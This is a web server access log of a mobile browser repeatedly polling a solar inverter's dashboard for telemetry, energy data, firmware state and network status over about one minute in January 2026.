fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1768089600000&end=1768431599999&bin=week_of_year&aggregation=diff" [Client 37.76.47.86] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:13 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.47.86] [Length 1684] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:13 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1767225600000&end=1768431599999&bin=month_of_year&aggregation=diff" [Client 37.76.47.86] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:13 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.47.86] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:13 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1767225600000&end=1768431599999&bin=yearly&aggregation=diff" [Client 37.76.47.86] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:14 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/events?pageSize=1000&pageOffset=0" [Client 37.76.47.86] [Length 233664] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:14 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/constant-multiple-data/2235101218" [Client 37.76.47.86] [Length 266] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:14 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/constant-multiple-data/2235101218" [Client 37.76.47.86] [Length 266] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:15 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.47.86] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:15 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 37.76.47.86] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:15 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.47.86] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 37.76.47.86] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:16 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.47.86] [Length 1689] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.47.86] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 37.76.47.86] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:16 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 37.76.47.86] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:20 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.47.86] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:20 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.47.86] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:20 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.47.86] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:25 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.47.86] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:25 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.47.86] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:28 +0000] - 403 403 - GET http fimer.profibot.hu "/v1/modbus_device_monitor/device/list" [Client 37.76.47.86] [Length 180] [Gzip 3.24] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:28 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.47.86] [Length 1681] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:29 +0000] - 403 403 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/grid_power_ctrl/obj/max_abs_active_power?scope=setting" [Client 37.76.47.86] [Length 22] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:29 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/elc/measures" [Client 37.76.47.86] [Length 337] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:29 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/elc/private/setup" [Client 37.76.47.86] [Length 111] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:29 +0000] - 204 204 - GET http fimer.profibot.hu "/v1/elc/config" [Client 37.76.47.86] [Length 0] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:29 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.47.86] [Length 306] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:29 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.47.86] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:29 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/domaintypes-metadata/?scope=telemetry" [Client 37.76.47.86] [Length 113454] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:29 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1768089600000&end=1768431599999&bin=week_of_year&aggregation=diff" [Client 37.76.47.86] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:29 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1767225600000&end=1768431599999&bin=month_of_year&aggregation=diff" [Client 37.76.47.86] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:29 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/events?pageSize=1000&pageOffset=0" [Client 37.76.47.86] [Length 233664] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:29 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/timeseries/data/2235101218/grid/main/active_energy?start=1767225600000&end=1768431599999&bin=yearly&aggregation=diff" [Client 37.76.47.86] [Length 39] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:29 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/constant-multiple-data/2235101218" [Client 37.76.47.86] [Length 266] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:29 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/constant-multiple-data/2235101218" [Client 37.76.47.86] [Length 266] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:30 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.47.86] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:30 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 37.76.47.86] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:30 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.47.86] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:30 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/time_mgr/obj" [Client 37.76.47.86] [Length 81] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 37.76.47.86] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.47.86] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/autotest/status/CEI021" [Client 37.76.47.86] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 37.76.47.86] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:31 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 37.76.47.86] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:33 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.47.86] [Length 1682] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:34 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.47.86] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:35 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.47.86] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:35 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.47.86] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:38 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.47.86] [Length 1679] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:39 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.47.86] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:40 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.47.86] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:40 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.47.86] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:40 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.47.86] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:43 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.47.86] [Length 1666] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:43 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.47.86] [Length 306] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:44 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.47.86] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:45 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.47.86] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:45 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 37.76.47.86] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:46 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.47.86] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:46 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/backend/obj/state" [Client 37.76.47.86] [Length 9] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:46 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/wifi/status" [Client 37.76.47.86] [Length 374] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:46 +0000] - 200 200 - GET http fimer.profibot.hu "/v2/eth/status" [Client 37.76.47.86] [Length 413] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:48 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.47.86] [Length 1685] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:49 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.47.86] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:50 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.47.86] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:50 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.47.86] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:50 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218//autotest/obj/configuration_reg/en" [Client 37.76.47.86] [Length 5] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:53 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.47.86] [Length 1685] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:54 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.47.86] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:55 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.47.86] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:55 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.47.86] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:58 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.47.86] [Length 1684] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:58 +0000] - 200 200 - POST http fimer.profibot.hu "/v1/orion/telemetry-multiple-data/2235101218" [Client 37.76.47.86] [Length 306] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:36:59 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/livedata" [Client 37.76.47.86] [Length 12] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:00 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/product" [Client 37.76.47.86] [Length 1812] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:00 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/ping-logger" [Client 37.76.47.86] [Length 222] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:01 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/fw_manager/obj" [Client 37.76.47.86] [Length 502] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:01 +0000] - 200 200 - GET http fimer.profibot.hu "/v1/orion/data/2235101218/remote_upgrade/obj" [Client 37.76.47.86] [Length 60] [Gzip -] [Sent-to 192.168.100.6] "Mozilla/5.0 (Linux; Android 10; K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/143.0.0.0 Mobile Safari/537.36" "http://fimer.profibot.hu/" +[14/Jan/2026:07:37:01 +0000] 